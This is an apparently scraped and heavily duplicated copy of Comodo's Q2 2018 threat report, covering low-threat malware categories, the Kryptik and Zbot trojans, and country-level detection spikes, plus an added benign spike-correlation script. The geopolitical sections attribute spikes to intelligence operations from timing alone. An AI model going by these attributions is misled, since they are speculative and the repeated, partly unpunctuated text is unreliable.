Our findings show that malware is becoming more cunning in delivery method, more sophisticated in persistence, and much harder to detect by antivirus software. Propagation of fileless malware, the evolution of cryptominers, and the use of legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication.

Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems, presaging new attacks and mobile malware development. As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures), cybercriminals can anticipate rich pickings from exploiting those devices. With successful penetration, perpetrators profit by stealing money, selling confidential information, or blackmailing victims.

Moreover, given that the majority of detected trojans in Q2 were information stealers, we can see another dangerous tendency: the accelerating bias of cybercriminals toward hunting for confidential data.

Combined, these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future, creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy, policies, and postures.

NORTH AMERICA
Comodo Security Solutions, Inc., 1255 Broad Street, Clifton, NJ 07013, United States. Tel: +1 (888) 551 1531, Tel: +1 (888) 266 6361, Int: +1 (703) 581 6361, Fax: +1 (973) 777 4394, sales@comodo.com

EUROPE
Comodo Security Solutions Inc., Șoseaua Națională 31, Iași 700237, Romania. Tel: +40 332 806 772

ASIA
Comodo Security Solutions Pvt. Ltd., Prestige Office Centre, 183 NSK Salai, Vadapalani, Chennai, India. Tel: +91 44 4562 2800, www.comodo.co.in

REQUEST A DEMO: Try Comodo Cybersecurity by speaking with a security consultant to begin the process to set up a demo or proof-of-concept project. Contact us directly at +1 888-266-6361.

© 2018 All Rights Reserved. Comodo Security Solutions, Inc. Visit comodo.com.

About Comodo Cybersecurity

Comodo Threat Research Labs monitors, filters, and analyzes malware, ransomware, viruses, and other "unknown" potentially dangerous files 24/7/365 in over 190 countries around the world. With 5 offices spread across the Americas, Asia, and Europe (and staff covering over 190 countries), the Lab is made up of more than 220 IT security professionals, ethical hackers, computer scientists, and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing millions of potential pieces of malware, phishing, spam, or other malicious/unwanted files and emails every day.

The Lab also works with trusted partners in academia, government, and industry to gain additional insights into known and potential threats. CTRL's mission is to use the best combination of cybersecurity technology and innovations, machine learning-powered analytics, artificial intelligence, and human experts and insights to secure and protect Comodo Cybersecurity customers, business and public-sector partners, and the public community.

Comodo Cybersecurity is a global innovator of cybersecurity solutions, protecting critical information across the digital landscape. Building on its unique position as the world's largest certificate authority, Comodo Cybersecurity authenticates, validates, and secures networks and infrastructures from individuals to mid-sized companies to the world's largest enterprises. Comodo Cybersecurity provides complete end-to-end security solutions across the boundary, internal network, and endpoint with innovative technologies, solving the most advanced malware threats, both known and unknown. With global headquarters in Clifton, New Jersey, and branch offices in Silicon Valley, Comodo Cybersecurity has international offices in China, India, the Philippines, Romania, Turkey, Ukraine, and the United Kingdom. For more information, visit comodo.com. Comodo Cybersecurity and the Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc. or its affiliates in the US and other countries. Other names may be trademarks of their respective owners. The current list of Comodo Cybersecurity trademarks and patents is available at comodo.com/repository.



5.3.4 Virtual Tools

Virtual Tools are programs that can modify or alter malicious files to avoid detection.

The top Virtual Tools that Comodo detected in Q2 2018 were Patcher, AntiAV, and RunFile.

The top two countries for Virtual Tools detections were Germany and the US.

This timeline shows that Germany had one particularly heavy infestation around the beginning of June, while the US had two sharp spikes, one at the start and the other at the end of Q2 2018.


5.3.5 Jokes

"Joke" malware is in fact just what it says: these are non-malicious applications which claim to take a malicious action when in fact they are only intended as humor, or simply to annoy the user for a brief period of time.

Such malware is typically only labeled a "Medium" threat because the hacker's intention is not to damage or destroy information but merely to have fun at the victim's expense.

Germany (de) and the US were the top two countries of detection for Joke malware.

In this timeline you can see that this malware type is not numerous – but still something to be aware of.


5.4 Low Threat Malware: Applications

In this section we will cover a range of malicious functionality that Comodo detected within Applications, Unwanted Applications, and Unsafe Applications.


5.4.1 Applications

Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose. However, Comodo detects and flags such applications as malicious because they exhibit behavior of which users may be unaware, including extreme efforts to track user behavior and location.

In Q2 2018 the most common such application was Elex. Despite the fact that Microsoft has labeled Elex only as a "Potentially Unwanted Application", or PUA, this software is nasty and attempts to install files that run at startup, add drivers, inject processes, alter browser behavior, and modify DNS settings.

The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications.

And finally, this timeline shows that, far from being a rare occurrence, such malicious software is endemic, especially in North America.


5.4.2 Unwanted Applications

The unwanted application malware category is alarming in that, during the course of common computer and Internet activity, users often inadvertently install these Applications. For example, they include common adware programs, widely disseminated images, videos, dialers, jokes, gossip, and more.

The most common unwanted application that Comodo detected this quarter was DealPly, which Microsoft describes as "poor reputation" software that tries to install additional bundled software, modify the user homepage, modify the search provider, and/or perform other actions users might not have intended. They include free toolbars, adware, and "system optimizers".

As you can see in the bubble chart, the US is far and away the most common country of detection for unwanted applications in Q2 2018.

And as this timeline shows, this malware type poses not only a large but also a daily challenge to network security in the US.


5.4.3 Unsafe Applications

Unsafe applications are seemingly legitimate programs but in fact are frequently leveraged by coders and hackers with malicious intent. Often they claim to help users with administrative or security functionality but in fact do the opposite, and include fake anti-virus and free Internet Relay Chat (IRC) clients.

The most common unsafe application that Comodo detected in Q2 2018 was AutoKMS, software that can be used to "crack" or patch unregistered copies of Microsoft software. These are referred to as "hacktools" and may be distributed with additional malware that users can install inadvertently.

This malware type is a bit different in that, while the US is currently the most common country of detection, Ukraine (ua) and Russia (ru) are #2 and #3 respectively.

This timeline shows that the US – and to a lesser extent Ukraine – have a steady problem with Unsafe Applications, while Russia experienced one major spike in Q2 2018.



About Comodo Cybersecurity

Brought to you by

  • 1 Executive summary
    • 11 Overview
    • 12 New Trends
      • 121 Trojans jumped to the top of the malware list
      • 122 Cryptominers evolved into multifunctional malware
      • 123 Android malware skyrocketed in variety
      • 124 Geopolitical intelligence
          • 2 Trojans going on the offensive to hunt for confidential data
            • 21 The Most Widespread Trojan
            • 22 PowerShell-based attack with Emotet
            • 23 Flawed Ammyy RAT attack based on legitimate software
            • 24 The growth of Flawed Ammyy attacks for Q2
            • 25 Ammyy Admin dissemination around the world for Q2
              • 3 Cryptominer Evolution
                • Going Fileless Killing Competitors Crashing Systems
                • 31 BadShell attacks enterprises
                • 32 WinstarNssmMiner a system killer
                • 33 CoinMiner kills rivals
                • 34 CoinHive changes its skin
                • 35 Cryptocurrency clipboard hijacker intercepts transfers
                  • 4 Android Devices Under Siege
                    • 41 Spying Stealing Mining
                      • 411 KevDroid
                      • 412 Zoo Park
                      • 413 MikeSpy
                      • 414 Xloader
                      • 415 Stalker Spy
                      • 416 Mystery Bot
                      • 417 FakeSpy
                      • 418 RedAlert
                      • 419 Hero Rat
                      • 4110 Sonvpay
                      • 4111 CoinHive
                        • 42 Android Malware Catalogued by Month
                          • 421 April 2018
                          • 422 May 2018
                          • 423 June 2018
                              • 5 Malware in Q2 2018 The Big Picture
                                • 51 Strategic Threat Computer Worms
                                  • 511 Generic Worms
                                  • 512 Net Worms
                                  • 513 Email Worms
                                  • 514 p2p Worms
                                  • 515 IM Worms
                                    • 52 High Threat Malware
                                      • 521 Backdoors
                                      • 522 Viruses
                                      • 523 Trojans
                                      • 524 Exploits
                                        • 53 Medium Threat Malware
                                          • 531 Constructor
                                          • 532 Packers
                                          • 533 Email Flooder
                                          • 534 Virtual Tools
                                          • 535 Jokes
                                            • 54 Low Threat Malware Applications
                                              • 541 Applications
                                              • 542 Unwanted Applications
                                              • 543 Unsafe Applications
                                                  • 6 Vertical analysis
                                                  • 7 Geopolitical Intelligence
                                                    • 71 USA
                                                    • 72 China
                                                    • 73 South Korea
                                                    • 74 North Korea
                                                    • 75 Armenia
                                                    • 76 Belarus
                                                    • 77 Iraq
                                                    • 78 Ukraine
                                                    • 79 Croatia
                                                    • 710 Finland Russia USA
                                                      • 8 Conclusions

Global Threat Report Q2 2018 Edition

Page 56 of 73

5.3.5 Jokes

"Joke" malware is in fact just what it says: these are non-malicious applications which claim to take a malicious action, when in fact they are only intended as humor, or simply to annoy the user for a brief period of time.

Such malware is typically only labeled a "Medium" threat because the hacker's intention is not to damage or destroy information but merely to have fun at the victim's expense.

Germany (de) and the US were the top two countries of detection for Joke malware.

In this timeline you can see that this malware type is not numerous – but still something to be aware of.


5.4 Low Threat Malware: Applications

In this section we will cover a range of malicious functionality that Comodo detected within Applications, Unwanted Applications and Unsafe Applications.


5.4.1 Applications

Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose. However, Comodo detects and flags such applications as malicious because they exhibit behavior of which users may be unaware, including extreme efforts to track user behavior and location.

In Q2 2018 the most common such application was Elex. Despite the fact that Microsoft has labeled Elex only as a "Potentially Unwanted Application" or PUA, this software is nasty and attempts to install files that run at startup, add drivers, inject processes, alter browser behavior and modify DNS settings.

The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications.

And finally, this timeline shows that, far from being a rare occurrence, such malicious software is endemic, especially in North America.


5.4.2 Unwanted Applications

The unwanted application malware category is alarming in that, during the course of common computer and Internet activity, users often inadvertently install these Applications. For example, they include common adware programs, widely disseminated images, videos, dialers, jokes, gossip and more.

The most common unwanted application that Comodo detected this quarter was DealPly, which Microsoft describes as "poor reputation" software that tries to install additional bundled software, modify the user's homepage, modify the search provider and/or perform other actions users might not have intended. Such software includes free toolbars, adware and "system optimizers".

As you can see in the bubble chart, the US is far and away the most common country of detection for unwanted applications in Q2 2018.

And as this timeline shows, this malware type poses not only a large but also a daily challenge to network security in the US.


5.4.3 Unsafe Applications

Unsafe applications are seemingly legitimate programs but in fact are frequently leveraged by coders and hackers with malicious intent. Often they claim to help users with administrative or security functionality but in fact do the opposite; examples include fake anti-virus and free Internet Relay Chat (IRC) clients.

The most common unsafe application that Comodo detected in Q2 2018 was AutoKMS, software that can be used to "crack" or patch unregistered copies of Microsoft software. Such programs are referred to as "hacktools" and may be distributed with additional malware that users can install inadvertently.

This malware type is a bit different in that, while the US is currently the most common country of detection, Ukraine (ua) and Russia (ru) are #2 and #3 respectively.

This timeline shows that the US – and to a lesser extent Ukraine – have a steady problem with Unsafe Applications, while Russia experienced one major spike in Q2 2018.


6 Vertical analysis

In this section, let's examine unique malware profiles that Comodo identified within specific "verticals", or economic sectors. The infographic details unique malware distributions for twenty-two vertical markets or industries, from automotive to travel, covering four dangerous malware types: Backdoors, Trojans, Viruses and Worms. Further, the diagram lists the #1 malware family for each Vertical's top malware type.

Let's take a closer look at two trojans, Kryptik and Zbot, that were the top detection not only in one but within multiple verticals, clearly making them a current strategic threat across the world.


First, Kryptik. The New Jersey Cybersecurity & Communications Integration Cell reported that Kryptik was first created to obtain information about an infected host's FTP servers but now has the ability to target email clients, file browsers and file managers. CNET Magazine wrote that Kryptik has been used as a trojan "Clicker" to boost the hit-count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash. Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country. Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017.

Second, let's examine "Zbot", which is another name for the "Zeus" Trojan, undermining Microsoft Windows security since 2007. One of its first uses was to target the United States Department of Transportation, and over a decade later Zbot is still the top Trojan in the government and transportation verticals. Today the Zeus botnet may be the largest on the Internet, with millions of compromised machines around the world.

Zeus has often been used to steal financial information such as account numbers and passwords via keystroke logging and online form grabbing. It has also been used to install ransomware, including CryptoLocker. Zbot is often spread through drive-by downloads and email phishing attacks, sometimes supported by a social engineering scheme that falsely claims that a target's computer already has a Virus and needs to be cleaned.

In conclusion: first, trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks. Second, strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies the primary malware threats and better focuses limited time and resources against them.


7 Geopolitical Intelligence

7.1 USA

This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018. Clearly, the major spike on March 13 stands out in this data. What happened on this day in the US, and what might help to explain the surge in malware activity? On that day, US President Donald Trump announced the names of his new Secretary of State, Mike Pompeo, and new CIA Director, Gina Haspel. In that light, one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements, comprising many requests for information related to upcoming changes in US political, military and intelligence activities, after which these agencies immediately began to fulfill these requirements via computer hacking – commonly called cyber espionage – which today takes place on a far greater scale than the public realizes.


7.2 China

This chart illustrates Comodo's aggregated malware detections in China for Q2 2018. Clearly, June 4 stands out as the single most prominent day. The reason for this massive spike is that many intelligence services – both foreign and domestic – were likely busy trying to protect and/or collect sensitive information relating to current events within China. Why on June 4? That is the anniversary of the 1989 Tiananmen Square protests.


7.3 South Korea

National security events always attract the attention of professional hackers who seek to collect the kind of information that forms the basis for intelligence reporting. This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018. The highest single spikes took place simultaneously with annual joint US-South Korean military exercises. This fact should come as little surprise in the Internet age, when everyone from students to soldiers, spies and statesmen does most of their work online: students collect data for academic papers, spies collect data for intelligence reports.


7.4 North Korea

The chart above shows Comodo malware detections in North Korea during Q2 2018. At the beginning of May, Comodo saw a spike consisting of well over ten times the usual number of detections. One plausible explanation for this activity is that someone, or some institution, was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world. Comodo did further research on the detected malware and identified it as Windows activation or "cracking" software and Chinese-made anti-censorship programs.


7.5 Armenia

All major geopolitical events today are bathed in malware. The reason is that all activities – from social activities to business, politics or national security affairs – are mostly performed online. This is especially true during times of national crisis, as both government and citizens are in overdrive trying to gather new information – or trying to prevent others from doing the same. Ample evidence is provided by this timeline, which shows that Armenia's 2018 political revolution was accompanied by Comodo's largest detection of malware within that country during Q2 2018.


7.6 Belarus

A common hacker refrain is that "information wants to be free". Evidence for this argument is provided by this timeline, which shows Comodo's Virus and Trojan detections in Belarus in Q2 2018. On June 14, as the government in Minsk passed new legislation with a view toward controlling the spread of "fake news", Comodo detected a massive spike in both viruses and trojans. It is possible that the virus outbreak was specifically used to disseminate trojan horses, which were then leveraged for some real-world purpose: either to gather, deny or manipulate sensitive information related to the new legislation and its impact on Belarusian society.


7.7 Iraq

Today there is possibly no hotter topic in information security than election hacking. In this chart, showing Comodo malware detections in Iraq in Q2 2018, two clear spikes stand out that we must consider. Both might be associated with recent electoral incidents. In mid-April, Iraq was preparing for a national election, which included a conundrum on how best to secure its electronic dimension. And at the beginning of July, Iraq was preparing for a vote recount following accusations of impropriety at the polls.


7.8 Ukraine

Sometimes it is hard to know the reason for a specific spike in malware detection – and sometimes there may be multiple reasons. In this timeline of Comodo malware detections in Ukraine in Q2 2018, there may have been multiple reasons for the highest spike, on May 24. Both of the cited news stories are from May 23: the first discusses Ukraine's Independence Day as well as Ukraine's testing of new military weapons provided by the US government; the second describes a cyberattack that Ukraine feared would target a major sporting event, the Champions League final in Ukraine's capital city, Kyiv, on May 26.


7.9 Croatia

Since the cyberattack that targeted Estonia in 2007, it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations. In that context, this massive spike in malware detection in Croatia on March 28 is interesting, as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an "act of hostility".


7.10 Finland, Russia, USA

Finally, let's have a look at Comodo's virus detections in Finland during Q2 2018. The largest single spike – by far – occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki. Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinki's suburb of Vantaa – precisely where the summit was scheduled to take place.
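Sections 7.1 to 7.10 all apply the same reading to a per-country chart: find the days whose detection count stands well above the usual level (the North Korea section speaks of "well over ten times" the usual number) and line them up with dated events, allowing for a spike that lands a day after the news (Croatia, Ukraine). The routine below is an added example, not code from the Comodo report; the country, daily counts and event calendar are constructed sample data, and the baseline is the median of the daily counts.

```python
"""Added example (not from the Comodo report): flag spikes in a daily
malware-detection timeline and pair them with dated events.

A day counts as a spike when its detections exceed `factor` times the
baseline, taken as the median of all daily counts (the median barely
moves when a handful of spike days are included). Each spike is then
matched to any event dated from `window` days before it up to the
same day. All dates, counts and events here are constructed."""
from datetime import date, timedelta
from statistics import median

# Constructed daily detections for a fictional country, 1 to 14 May 2018.
SAMPLE_COUNTS = {
    date(2018, 5, 1) + timedelta(days=i): n
    for i, n in enumerate([12, 14, 11, 12, 15, 160, 12, 10, 14, 13, 11, 12, 40, 12])
}

# Constructed event calendar in the style of the report's per-country notes.
SAMPLE_EVENTS = {
    date(2018, 5, 5): "government announces new legislation",
    date(2018, 5, 13): "joint military exercise begins",
}


def baseline(counts):
    """Median of the daily counts; the report's 'usual number of detections'."""
    return median(counts.values())


def find_spikes(counts, factor=10.0):
    """Return (day, count, ratio) for every day above factor x the baseline."""
    base = baseline(counts)
    spikes = []
    for day in sorted(counts):
        ratio = counts[day] / base if base else float("inf")
        if ratio > factor:
            spikes.append((day, counts[day], round(ratio, 1)))
    return spikes


def correlate(spikes, events, window=1):
    """Pair each spike with events dated up to `window` days before it,
    so a spike the day after an announcement is still attributed to it."""
    out = []
    for day, count, ratio in spikes:
        matched = [
            (ev_day, text)
            for ev_day, text in sorted(events.items())
            if 0 <= (day - ev_day).days <= window
        ]
        out.append({"day": day, "count": count, "ratio": ratio, "events": matched})
    return out


def analyze(counts, events, factor=10.0, window=1):
    """Spike detection followed by event correlation, as one call."""
    return correlate(find_spikes(counts, factor), events, window)


if __name__ == "__main__":
    # A lower factor surfaces the smaller 13 May bump as well as the 6 May spike.
    for hit in analyze(SAMPLE_COUNTS, SAMPLE_EVENTS, factor=3.0):
        label = "; ".join(f"{d}: {t}" for d, t in hit["events"]) or "no event in window"
        print(f"{hit['day']}  count={hit['count']:<4} x{hit['ratio']}  {label}")
```

The factor and window are the analyst's judgment calls: a spike with no event in the window is still a spike, and an event with no spike says nothing about the absence of activity.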


8 Conclusions

In Q2, Comodo Cybersecurity observed several new, significant trends likely to radically influence the cybersecurity marketplace and IT end users. These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios.

The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon. Trojans are a covert weapon, and the cybersecurity industry should suppose that many trojan-based attacks that occurred in Q2 remain undetected, with the real impact of these attacks being revealed in quarters to come. Another meaningful fact is that trojans serve as a delivery vector for other types of malware. Combined, these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples.

Our findings show that malware is becoming more cunning in its delivery method, more sophisticated in persistence and much harder for antivirus software to detect. Propagation of fileless malware, the evolution of cryptominers and the use of legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication.

Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems, presaging new attacks and mobile malware development. As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures), cybercriminals can anticipate rich pickings from exploiting those devices. With successful penetration, perpetrators profit by stealing money, selling confidential information or blackmailing victims.

Moreover, given that the majority of detected trojans in Q2 were information stealers, we can see another dangerous tendency: the accelerating bias of cybercriminals toward hunting for confidential data.

Combined, these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future, creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy, policies and postures.

NORTH AMERICA
Comodo Security Solutions, Inc.
1255 Broad Street, Clifton, NJ 07013, United States
Tel: +1 (888) 551 1531, +1 (888) 266 6361; Int: +1 (703) 581 6361; Fax: +1 (973) 777 4394
sales@comodo.com

EUROPE
Comodo Security Solutions, Inc.
Șoseaua Națională 31, Iași 700237, Romania
+40 332 806 772

ASIA
Comodo Security Solutions Pvt. Ltd.
Prestige Office Centre, 183 NSK Salai, Vadapalani, Chennai, India
Tel: +91 44 4562 2800
www.comodo.co.in

REQUEST A DEMO: Try Comodo Cybersecurity by speaking with a security consultant to begin the process to set up a demo or proof-of-concept project. Contact us directly at +1 888-266-6361.

© 2018 All Rights Reserved. Comodo Security Solutions, Inc. Visit comodo.com.

Comodo Threat Research Labs monitors, filters and analyzes malware, ransomware, viruses and other "unknown" potentially dangerous files 24/7/365 in over 190 countries around the world. With 5 offices spread across the Americas, Asia and Europe (and staff covering over 190 countries), the Lab is made up of more than 220 IT security professionals, ethical hackers, computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing millions of potential pieces of malware, phishing, spam or other malicious/unwanted files and emails every day. The Lab also works with trusted partners in academia, government and industry to gain additional insights into known and potential threats. CTRL's mission is to use the best combination of cybersecurity technology and innovations, machine learning-powered analytics, artificial intelligence and human experts and insights to secure and protect Comodo Cybersecurity customers, business and public-sector partners and the public community.

About Comodo Cybersecurity

Comodo Cybersecurity is a global innovator of cybersecurity solutions, protecting critical information across the digital landscape. Building on its unique position as the world's largest certificate authority, Comodo Cybersecurity authenticates, validates and secures networks and infrastructures from individuals to mid-sized companies to the world's largest enterprises. Comodo Cybersecurity provides complete end-to-end security solutions across the boundary, internal network and endpoint with innovative technologies solving the most advanced malware threats, both known and unknown. With global headquarters in Clifton, New Jersey and branch offices in Silicon Valley, Comodo Cybersecurity has international offices in China, India, the Philippines, Romania, Turkey, Ukraine and the United Kingdom. For more information visit comodo.com. Comodo Cybersecurity and the Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc. or its affiliates in the US and other countries. Other names may be trademarks of their respective owners. The current list of Comodo Cybersecurity trademarks and patents is available at comodo.com/repository.

  • 1 Executive summary
    • 11 Overview
    • 12 New Trends
      • 121 Trojans jumped to the top of the malware list
      • 122 Cryptominers evolved into multifunctional malware
      • 123 Android malware skyrocketed in variety
      • 124 Geopolitical intelligence
          • 2 Trojans going on the offensive to hunt for confidential data
            • 21 The Most Widespread Trojan
            • 22 PowerShell-based attack with Emotet
            • 23 Flawed Ammyy RAT attack based on legitimate software
            • 24 The growth of Flawed Ammyy attacks for Q2
            • 25 Ammyy Admin dissemination around the world for Q2
              • 3 Cryptominer Evolution
                • Going Fileless Killing Competitors Crashing Systems
                • 31 BadShell attacks enterprises
                • 32 WinstarNssmMiner a system killer
                • 33 CoinMiner kills rivals
                • 34 CoinHive changes its skin
                • 35 Cryptocurrency clipboard hijacker intercepts transfers
                  • 4 Android Devices Under Siege
                    • 41 Spying Stealing Mining
                      • 411 KevDroid
                      • 412 Zoo Park
                      • 413 MikeSpy
                      • 414 Xloader
                      • 415 Stalker Spy
                      • 416 Mystery Bot
                      • 417 FakeSpy
                      • 418 RedAlert
                      • 419 Hero Rat
                      • 4110 Sonvpay
                      • 4111 CoinHive
                        • 42 Android Malware Catalogued by Month
                          • 421 April 2018
                          • 422 May 2018
                          • 423 June 2018
                              • 5 Malware in Q2 2018 The Big Picture
                                • 51 Strategic Threat Computer Worms
                                  • 511 Generic Worms
                                  • 512 Net Worms
                                  • 513 Email Worms
                                  • 514 p2p Worms
                                  • 515 IM Worms
                                    • 52 High Threat Malware
                                      • 521 Backdoors
                                      • 522 Viruses
                                      • 523 Trojans
                                      • 524 Exploits
                                        • 53 Medium Threat Malware
                                          • 531 Constructor
                                          • 532 Packers
                                          • 533 Email Flooder
                                          • 534 Virtual Tools
                                          • 535 Jokes
                                            • 54 Low Threat Malware Applications
                                              • 541 Applications
                                              • 542 Unwanted Applications
                                              • 543 Unsafe Applications
                                                  • 6 Vertical analysis
                                                  • 7 Geopolitical Intelligence
                                                    • 71 USA
                                                    • 72 China
                                                    • 73 South Korea
                                                    • 74 North Korea
                                                    • 75 Armenia
                                                    • 76 Belarus
                                                    • 77 Iraq
                                                    • 78 Ukraine
                                                    • 79 Croatia
                                                    • 710 Finland Russia USA
                                                      • 8 Conclusions

Global Threat Report Q2 2018 Edition

Page 57 of 73

54 Low Threat Malware Applications In this section we will cover a range of malicious functionality that Comodo detected within Applications Unwanted Applications and Unsafe Applications

Global Threat Report Q2 2018 Edition

Page 58 of 73

541 Applications Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose However Comodo detects and flags such applications as malicious because they to exhibit behavior that of which users may be unaware including extreme efforts to track user behavior and location

In Q2 2018 the most common such application was Elex Despite the fact that Microsoft has labeled Elex only as ldquoPotentially Unwanted Applicationrdquo or PUA this software is nasty and attempts to install files that run at startup add drivers inject processes alter browser behavior and modify DNS settings

The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications

And finally this timeline shows that far from being a rare occurrence such malicious software is endemic especially in North America

Global Threat Report Q2 2018 Edition

Page 59 of 73

542 Unwanted Applications The unwanted application malware category is alarming in that during the course of common computer and Internet activity users often inadvertently install these Applications For example they include common adware programs widely disseminated images videos dialers jokes gossip and more

The most common unwanted application that Comodo detected this quarter was DealPly which Microsoft describes as ldquopoor reputationrdquo software that tries to install additional bundled software modify the user homepage modify search provider andor perform other actions users might not have intended They include free toolbars adware and ldquosystem optimizersrdquo

As you can see in the bubble chart the US is far and away the most common country of detection for unwanted applications in Q2 2018

And as this timeline shows this malware type poses not only a large but also a daily challenge to network security in the US

Global Threat Report Q2 2018 Edition

Page 60 of 73

5.4.3 Unsafe Applications

Unsafe applications are seemingly legitimate programs that are in fact frequently leveraged by coders and hackers with malicious intent. They often claim to help users with administrative or security functionality but do the opposite; examples include fake anti-virus products and free Internet Relay Chat (IRC) clients.

The most common unsafe application that Comodo detected in Q2 2018 was AutoKMS, software that can be used to "crack" or patch unregistered copies of Microsoft software. Such programs are referred to as "hacktools" and may be distributed together with additional malware that users then install inadvertently.

This malware type is a bit different in that, while the US is currently the most common country of detection, Ukraine (ua) and Russia (ru) are #2 and #3 respectively.

This timeline shows that the US, and to a lesser extent Ukraine, have a steady problem with unsafe applications, while Russia experienced one major spike in Q2 2018.

6 Vertical analysis

In this section let's examine the unique malware profiles that Comodo identified within specific "verticals", or economic sectors. The infographic details unique malware distributions for twenty-two vertical markets or industries, from automotive to travel, covering four dangerous malware types: Backdoors, Trojans, Viruses and Worms. Further, the diagram lists the #1 malware family for each vertical's top malware type.

Let's take a closer look at two trojans, Kryptik and Zbot, that were the top detection not in just one but in multiple verticals, clearly making them a current strategic threat across the world.

First, Kryptik. The New Jersey Cybersecurity & Communications Integration Cell reported that Kryptik was first created to obtain information about an infected host's FTP servers but now has the ability to target email clients, file browsers and file managers. CNET Magazine wrote that Kryptik has been used as a trojan "clicker" to boost the hit count of websites, and that it has spread through downloads of Microsoft Silverlight and Adobe Flash. Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country. Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017. One caveat when reading such statistics: "Kryptik" is also widely used by antivirus vendors as a generic detection name for heavily obfuscated or packed trojans, so samples carrying the label do not necessarily share a single code base or operator.

Second, let's examine "Zbot", another name for the "Zeus" Trojan, which has been undermining Microsoft Windows security since 2007. One of its first uses was to target the United States Department of Transportation, and over a decade later Zbot is still the top Trojan in the government and transportation verticals. Today the Zeus botnet may be the largest on the Internet, with millions of compromised machines around the world.

Zeus has often been used to steal financial information such as account numbers and passwords via keystroke logging and online form grabbing. It has also been used to install ransomware, including CryptoLocker. Zbot is often spread through drive-by downloads and email phishing attacks, sometimes supported by a social engineering scheme that falsely claims that a target's computer already has a virus and needs to be cleaned.

In conclusion, trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks. Strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies the primary malware threats and better focuses limited time and resources against them.

7 Geopolitical Intelligence

7.1 USA

This timeline displays a range of the most dangerous malware types detected within the United States in spring 2018. Clearly, the major spike on March 13 stands out in this data. What happened on this day in the US, and what might help to explain the surge in malware activity? On that day US President Donald Trump announced the names of his new Secretary of State, Mike Pompeo, and new CIA Director, Gina Haspel. In that light, one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements, comprising many requests for information related to upcoming changes in US political, military and intelligence activities, and immediately began to fulfill these requirements via computer hacking (commonly called cyber espionage), which today takes place on a far greater scale than the public realizes.

7.2 China

This chart illustrates Comodo's aggregated malware detections in China for Q2 2018. Clearly, June 4 stands out as the single most prominent day. The reason for this massive spike is that many intelligence services, both foreign and domestic, were likely busy trying to protect and/or collect sensitive information relating to current events within China. Why June 4? That is the anniversary of the 1989 Tiananmen Square protests.

7.3 South Korea

National security events always attract the attention of professional hackers, who seek to collect the kind of information that serves as the basis for intelligence reporting. This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018. The highest single spikes took place at the same time as the annual joint US-South Korean military exercises. This fact should come as little surprise in the Internet age, when everyone from students to soldiers, spies and statesmen does most of their work online: students collect data for academic papers, spies collect data for intelligence reports.

7.4 North Korea

The chart above shows Comodo malware detections in North Korea during Q2 2018. At the beginning of May, Comodo saw a spike of well over ten times the usual number of detections. One plausible explanation for this activity is that someone, or some institution, was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world. Comodo did further research on the detected malware and identified it as Windows activation or "cracking" software and Chinese-made anti-censorship programs.

7.5 Armenia

All major geopolitical events today are bathed in malware. The reason is that almost all activities, from social life to business, politics and national security affairs, are now performed online. This is especially true during times of national crisis, when both government and citizens are in overdrive trying to gather new information, or trying to prevent others from doing the same. Ample evidence is provided by this timeline, which shows that Armenia's 2018 political revolution was accompanied by Comodo's largest detection of malware within that country during Q2 2018.

7.6 Belarus

A common hacker refrain is that "information wants to be free". Evidence for this argument is provided by this timeline, which shows Comodo's virus and trojan detections in Belarus in Q2 2018. On June 14, as the government in Minsk passed new legislation with a view toward controlling the spread of "fake news", Comodo detected a massive spike in both viruses and trojans. It is possible that the virus outbreak was specifically used to disseminate trojan horses, which were then leveraged for some real-world purpose: to gather, deny or manipulate sensitive information related to the new legislation and its impact on Belarusian society.

